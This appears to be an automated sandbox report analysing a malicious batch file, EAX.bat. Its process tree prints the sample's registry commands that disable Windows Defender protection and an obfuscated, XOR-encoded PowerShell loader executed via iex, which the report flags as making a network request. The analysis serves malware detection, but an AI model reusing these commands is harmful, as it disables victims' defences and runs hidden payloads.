Analysis

  • max time kernel
    133s
  • max time network
    146s
  • platform
    windows10-1703_x64
  • resource
    win10-20240404-en
  • resource tags

    arch:x64arch:x86image:win10-20240404-enlocale:en-usos:windows10-1703-x64system
  • submitted
    08-05-2024 21:46

General

  • Target

    EAX.bat

  • Size

    13KB

  • MD5

    702ac05d7d2c6fcb005d0f072e7e1dee

  • SHA1

    0538b012778f133432a0778fdb540292b9f6ef94

  • SHA256

    d6df7159e2798c2e3a8d65c2a15d15bd85a9d4a73d1a196ba7bebc32113b20f9

  • SHA512

    e9179fc17d850c840df69a5580c016155cba2cfad099cac1b74037fb16b77156035b948f0eec1ee78c17e8153eab33135fe6ae0f6ded9813e972b7585845c796

  • SSDEEP

    384:+SopGvVZz6qws74S+ngzstcpshXrDUsDul0f6dniof5+tLohTleawO6jxi5Dm3u4:Ljmq97R+kpmDUXBK8w19mm3v

Malware Config

Signatures

  • Modifies Windows Defender Real-time Protection settings 3 TTPs 2 IoCs
  • Blocklisted process makes network request 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Using powershell.exe command.

  • Runs net.exe
  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 18 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\EAX.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:3608
    • C:\Windows\system32\net.exe
      net session
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:3884
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 session
        3⤵
          PID:4776
      • C:\Windows\system32\reg.exe
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
        2⤵
          PID:5016
        • C:\Windows\system32\reg.exe
          reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableRealtimeMonitoring /t REG_DWORD /d 1 /f
          2⤵
          • Modifies Windows Defender Real-time Protection settings
          PID:4876
        • C:\Windows\system32\net.exe
          net stop WinDefend
          2⤵
          • Suspicious use of WriteProcessMemory
          PID:4884
          • C:\Windows\system32\net1.exe
            C:\Windows\system32\net1 stop WinDefend
            3⤵
              PID:4840
          • C:\Windows\system32\net.exe
            net start WinDefend
            2⤵
            • Suspicious use of WriteProcessMemory
            PID:732
            • C:\Windows\system32\net1.exe
              C:\Windows\system32\net1 start WinDefend
              3⤵
                PID:4404
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              powershell.exe -NoExit -encodedCommand $ h e h e h e   =   " N C c 8 M S Y 7 P T x y H j 0 9 O S c i F C c 8 M X I p X 1 h y c n J y A j M g M z 9 y e n Y / P T Y n P j c c M z 8 3 f n J 2 N C c 8 M S Y 7 P T w c M z 8 3 e 1 9 Y c n J y c n Y z I S E 3 P 3 J v c n o J E y I i F j 0 / M z s 8 D 2 h o E S c g I D c 8 J h Y 9 P z M 7 P H w V N y Y T I S E 3 P z A + O z c h e n t y L l 9 Y c n J y c g U 6 N y A 3 f x 0 w O D c x J n I p c n Y N f B U + P T A z P h M h I T c / M D 4 r E T M x O j d y f x M 8 N n J 2 D X w e P T E z J j s 9 P H w B I j 4 7 J n p 1 D g 5 1 e w l / Y w 9 8 X 1 h y c n J y c h c j J z M + I X p 1 A S s h J j c / f D Y + P n V 7 X 1 h y c n J y c i 9 7 f B U 3 J g Y r I j d 6 d R 8 7 M S A 9 I T 0 0 J n w F O z x h Y H w H P C E z N D c c M y Y 7 J D c f N y Y 6 P T Y h d X t f W H J y c n J 2 J j 8 i b x J 6 e 1 9 Y c n J y c n Y z I S E 3 P 3 w V N y Y f N y Y 6 P T Y h e n t y L n I U P S A X M z E 6 f x 0 w O D c x J n I p G z R 6 d g 1 8 H D M / N 3 J / P j s 5 N 3 J w F T d 4 A n g 9 M X g 2 N i A 3 I S F w e 3 I p d i Y / I n l v d g 0 v L 1 9 Y c n J y c i A 3 J i c g P H J 2 J j 8 i C W I P f B s 8 J D 0 5 N 3 p 2 P C c + P n 5 y E n p 6 d j M h I T c / f B U 3 J h 8 3 J j o 9 N n p 1 F T c m H z 0 2 J z 4 3 G j M 8 N j 4 3 d X t 7 f B s 8 J D 0 5 N 3 p 2 P C c + P n 5 f W B J 6 d j 8 9 N i c + N x w z P z d 7 e 3 5 y d j Q n P D E m O z 0 8 H D M / N 3 t 7 X 1 g v X 1 h f W F 9 Y N C c 8 M S Y 7 P T x y N T c m F j c + N z U z J j c G K y I 3 c i l f W H J y c n I C M y A z P 3 J 6 X 1 h y c n J y c g k C M y A z P z c m N y B 6 A j 0 h O y Y 7 P T x y b 3 J i f n I f M z w 2 M y Y 9 I C t y b 3 J 2 B i A n N 3 s P c g k G K y I 3 C Q 8 P X 1 h y c n J y c n Y 0 J z w x f n I J A j M g M z 8 3 J j c g e g I 9 I T s m O z 0 8 c m 9 y Y 3 s P c g k G K y I 3 D 3 J 2 N j c + B i s i N 3 J v c g k E P T s 2 D 1 9 Y c n J y c n t f W H J y c n J 2 J i s i N 3 J v c g k T I i I W P T 8 z O z w P a G g R J y A g N z w m F j 0 / M z s 8 f F 9 Y c n J y c h Y 3 N D s 8 N x Y r P D M / O z E T I S E 3 P z A + K 3 p 6 H D c l f x 0 w O D c x J n I B K y E m N z 9 8 A D c 0 P j c x J j s 9 P H w T I S E 3 P z A + K x w z P z d 6 d Q A 3 N D 4 3 M S Y 3 N h Y 3 P j c 1 M y Y 3 d X t 7 f l 9 Y C Q E r I S Y 3 P 3 w A N z Q + N z E m O z 0 8 f B c / O y Z 8 E y E h N z 8 w P i s Q J z s + N j c g E z E x N y E h D 2 h o A C c 8 e 3 x f W H J y c n I W N z Q 7 P D c W K z w z P z s x H z 0 2 J z 4 3 e n U b P B 8 3 P z 0 g K x 8 9 N i c + N 3 V + c n Y 0 M z 4 h N 3 t 8 X 1 h y c n J y F j c 0 O z w 3 B i s i N 3 p 1 H y s W N z 4 3 N T M m N w Y r I j d 1 f n J 1 E T 4 z I S F + c g I n M D 4 7 M X 5 y A T c z P j c 2 f n I T P C E 7 E T 4 z I S F + X 1 h y c n J y E y c m P R E + M y E h d X 5 y C Q E r I S Y 3 P 3 w f J z 4 m O z E z I S Y W N z 4 3 N T M m N w 9 7 X 1 h f W H J y d i Y r I j d 8 X 1 h y c n J y F j c 0 O z w 3 E T 0 8 I S Y g J z E m P S B 6 d Q A G A S I 3 M T s z P h w z P z d + c h o 7 N j c Q K w E 7 N X 5 y A i c w P j s x d X 5 f W A k B K y E m N z 9 8 A D c 0 P j c x J j s 9 P H w R M z 4 + O z w 1 E T 0 8 J D c 8 J j s 9 P C E P a G g B J j M 8 N j M g N n 5 y d j Q n P D F 7 f F 9 Y c n J y c n I B N y Y b P y I + N z 8 3 P C Y z J j s 9 P B Q + M z U h e n U A J z w m O z 8 3 f n I f M z w z N T c 2 d X t f W F 9 Y c n J 2 J i s i N 3 x f W H J y c n I W N z Q 7 P D c f N y Y 6 P T Z 6 d R s 8 J D 0 5 N 3 V + c n U C J z A + O z F + c h o 7 N j c Q K w E 7 N X 5 y H D c l A T 4 9 J n 5 y B D s g J i c z P n V + c n Y 2 N z 4 G K y I 3 f l 9 Y d j Q n P D F 7 f H I B N y Y b P y I + N z 8 3 P C Y z J j s 9 P B Q + M z U h e n U A J z w m O z 8 3 f n I f M z w z N T c 2 d X t f W H J y c n I g N y Y n I D x y d i Y r I j d 8 E S A 3 M y Y 3 B i s i N 3 p 7 X 1 g v X 1 h f W F 9 Y C R s 8 J g I m I A 9 2 N C c 8 M R M 2 N i B y b 3 I e P T 0 5 J y I U J z w x c j M / I T t 8 N j 4 + c h M / I T s d I j c 8 A T c h I T s 9 P F 9 Y d j 0 + N g I g P S Y 3 M S Y 7 P T w Q J z Q 0 N y B y b 3 J i X 1 h 2 J C J v C Q E r I S Y 3 P 3 w A J z w m O z 8 3 f B s 8 J j c g P S I B N y A k O z E 3 I X w f M y A h O j M + D 2 h o F T c m F j c + N z U z J j c U P S A U J z w x J j s 9 P A I 9 O z w m N y B 6 e h 4 9 P T k n I h Q n P D F y O T c g P D c + Y W B 8 N j 4 + c g Q 7 I C Y n M z 4 C I D 0 m N z E m e 3 5 y e j U 3 J h Y 3 P j c 1 M y Y 3 B i s i N 3 I S e g k b P C Y C J i A P f n I J B x s 8 J m F g D 3 5 y C Q c b P C Z h Y A 9 + c g k H G z w m Y W A P f B 8 z O T c Q K w A 3 N A Y r I j d 6 e 3 t y e g k Q P T 0 + D 3 t 7 e 1 9 Y d i Q i f B s 8 J D 0 5 N 3 p 2 N C c 8 M R M 2 N i B + c m F + c m I q Z m J + c g k g N z Q P d j 0 + N g I g P S Y 3 M S Y 7 P T w Q J z Q 0 N y B 7 X 1 h 2 M C c 0 c m 9 y C R A r J j c J D w 9 y e m I q Z m p + Y i p h Y 3 5 i K j F r e 1 9 Y C Q E r I S Y 3 P 3 w A J z w m O z 8 3 f B s 8 J j c g P S I B N y A k O z E 3 I X w f M y A h O j M + D 2 h o E T 0 i K 3 p 2 M C c 0 f n J i f n J 2 N C c 8 M R M 2 N i B + c m F 7 X 1 g l N T c m c n A 6 J i Y i I W h 9 f T R m Z z E x N m N m f z E 2 Y T R / Z m V m M 3 9 q a m s 3 f z Y 3 Y z N i a 2 B n M W R h Y n 9 i Y n 8 5 I m U j M y U z M D 0 h J T N 8 I D s 5 N y B 8 I D c i P j s m f D Y 3 J H 0 A N z U 7 I S Y g M y Y 7 P T x 8 N y o 3 f n B y f x 1 y c B F o D g c h N y A h D n Y 3 P C R o B w E X A B w T H x c O E y I i F j M m M w 4 e P T E z P g 4 G N z 8 i D g A 3 N T s h J i A z J j s 9 P H w 3 K j d w X 1 g B J j M g J n 8 C I D 0 x N y E h c n 8 U O z 4 3 A j M m O n J w E W g O B y E 3 I C E O d j c 8 J G g H A R c A H B M f F w 4 T I i I W M y Y z D h 4 9 M T M + D g Y 3 P y I O A D c 1 O y E m I D M m O z 0 8 f D c q N 3 B y "  
 $ X o r _ V a l   =   8 2  
 $ x r   =   [ C o n v e r t ] : : F r o m B a s e 6 4 S t r i n g ( $ h e h e h e )  
 $ f a f a f   =   $ x r   |   F o r E a c h - O b j e c t   {   r e t u r n   $ _   - b x o r   $ X o r _ V a l   }  
 $ d e c s c r   =   [ t e x t . e n c o d i n g ] : : u t f 8 . G e t S t r i n g ( $ f a f a f )  
 i e x   $ d e c s c r  
 
              2⤵
              • Blocklisted process makes network request
              • Command and Scripting Interpreter: PowerShell
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:1752

          Network

          MITRE ATT&CK Enterprise v15

          Replay Monitor

          Loading Replay Monitor...

          Downloads

          • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_w4tjigds.nz3.ps1

            Filesize

            1B

            MD5

            c4ca4238a0b923820dcc509a6f75849b

            SHA1

            356a192b7913b04c54574d18c28d46e6395428ab

            SHA256

            6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b

            SHA512

            4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

          • memory/1752-4-0x00007FF8BC563000-0x00007FF8BC564000-memory.dmp

            Filesize

            4KB

          • memory/1752-5-0x000002036C6F0000-0x000002036C712000-memory.dmp

            Filesize

            136KB

          • memory/1752-32-0x000002036C880000-0x000002036C8BC000-memory.dmp

            Filesize

            240KB

          • memory/1752-44-0x00007FF8BC560000-0x00007FF8BCF4C000-memory.dmp

            Filesize

            9.9MB

          • memory/1752-45-0x00007FF8BC560000-0x00007FF8BCF4C000-memory.dmp

            Filesize

            9.9MB

          • memory/1752-43-0x000002036CE90000-0x000002036CF06000-memory.dmp

            Filesize

            472KB

          • memory/1752-86-0x00007FF8BC563000-0x00007FF8BC564000-memory.dmp

            Filesize

            4KB

          • memory/1752-87-0x00007FF8BC560000-0x00007FF8BCF4C000-memory.dmp

            Filesize

            9.9MB